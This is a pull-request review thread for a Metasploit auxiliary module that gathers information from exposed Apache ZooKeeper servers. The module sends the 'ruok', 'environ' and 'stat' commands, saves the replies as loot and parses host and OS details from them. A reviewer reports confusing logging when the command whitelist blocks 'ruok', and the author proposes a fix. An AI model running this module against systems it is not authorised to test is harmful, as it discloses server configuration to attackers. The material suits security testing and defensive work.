modules/auxiliary/gather/zookeeper_info_disclosure.rb

```diff
@@ -0,0 +1,105 @@
+                        ],
+                      'Author' =>
+                        [
+                          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
+                        ],
+                      'DisclosureDate' => '2020-10-14',
+                      'License' => MSF_LICENSE,
+                      'DefaultOptions' => { 'VERBOSE' => true })
+      )
+
+    register_options(
+      [
+        Opt::RPORT(2181),
+        OptInt.new('TIMEOUT', [true, 'Timeout for the probe', 30])
+      ], self.class
+    )
+
+    deregister_options('USERNAME', 'PASSWORD')
+  end
+
+  def run_host(_ip)
+    to = datastore['TIMEOUT'].zero? ? 30 : datastore['TIMEOUT']
+    vprint_status("Using a timeout of #{to}...")
+    begin
+      ::Timeout.timeout(to) do
+        connect
+        print_status('Verifying if server is responding...')
+        sock.put('ruok')
+        data = sock.get_once(-1, to).to_s
+
+        if data && data.to_s =~ /imok/
+          print_good("Server says: #{data}. Going ahead with extraction..\n")
+          connect
+          print_status('Dumping environment info...')
+          sock.put('environ')
+          data = sock.get_once(-1, to).to_s
+          print_good(data.to_s)
+          sock.close
+
+          loot_name = 'environ-log'
+          loot_type = 'text/plain'
+          loot_desc = 'Zookeeper Environment Log'
+          loot_service = 'Zookeeper'
+          p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc, loot_service)
+          print_good("File saved in: #{p} \n")
+
+          version = data.match(/zookeeper.version=\s*\S*/).to_s.split('=')[1].split(',')[0]
+          hname = data.match(/host.name=\s*\S*/).to_s.split('=')[1]
+          os_type = data.match(/os.name=\s*\S*/).to_s.split('=')[1]
+          os_arch = data.match(/os.arch=\s*\S*/).to_s.split('=')[1]
+          os_ver = data.match(/os.version=\s*\S*/).to_s.split('=')[1]
+          os = os_type.to_s + " " + os_arch.to_s + " " + os_ver.to_s
+
+          host_info = {
+            host: rhost,
+            os_name: os_type,
+            name: hname,
+            comments: os
+          }
+          report_host(host_info)
+          report_service(host: rhost, port: rport, name: 'Zookeeper', info: "Apache Zookeeper: #{version}")
+
+          connect
+          print_status('Dumping statistics about performance and connected clients...')
+          sock.put('stat')
+          data = sock.get_once(-1, to).to_s
+          print_good(data.to_s)
+          sock.close
+
+          loot_name = 'stat-log'
+          loot_type = 'text/plain'
+          loot_desc = 'Zookeeper Stat Log'
+          loot_service = 'Zookeeper'
+          p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc, loot_service)
+          print_good("File saved in: #{p} \n")
+        else
+          print_error('No good response from server. Exiting.')
```

Comment:
What are your thoughts on improving the logging here? 👀 

I've just ran this locally against a zookeeper running in docker and I just got this back as a response from the module:
```
msf6 auxiliary(gather/zookeeper_info_disclosure) > run

[*] 127.0.0.1:2181        - Using a timeout of 30...
[*] 127.0.0.1:2181        - Verifying if server is responding...
[-] 127.0.0.1:2181        - No good response from server. Exiting.
[*] 127.0.0.1:2181        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I had to add a breakpoint into the source code to see what response I was getting back from the server:

```
[1] pry(#<Msf::Modules::Auxiliary__Gather__Zookeeper_info_disclosure::MetasploitModule>)> data
=> "ruok is not executed because it is not in the whitelist.\n"
```

I had to rerun with `4lw.commands.whitelist` enabled to get an `imok` response back from the server.

It wasn't immediately what had gone wrong as a first time user of this module 😄

Reply:
Thanks @adfoster-r7 Valid point. My intent with this check is to try & verify ZooKeeper service is running & responsive. By sending 'ruok', ZK service will likely respond with either 'imok' or 'whitelist' message that you encountered. In both cases, this is a good indication that module can / should proceed.

The new update will handle this case now as follows:
```
if data && (data.to_s =~ /imok/ || data.to_s =~ /whitelist/)
````
I've also added response handling for environment and stat commands. Pushing the changes in a few minutes. Thanks for your feedback.!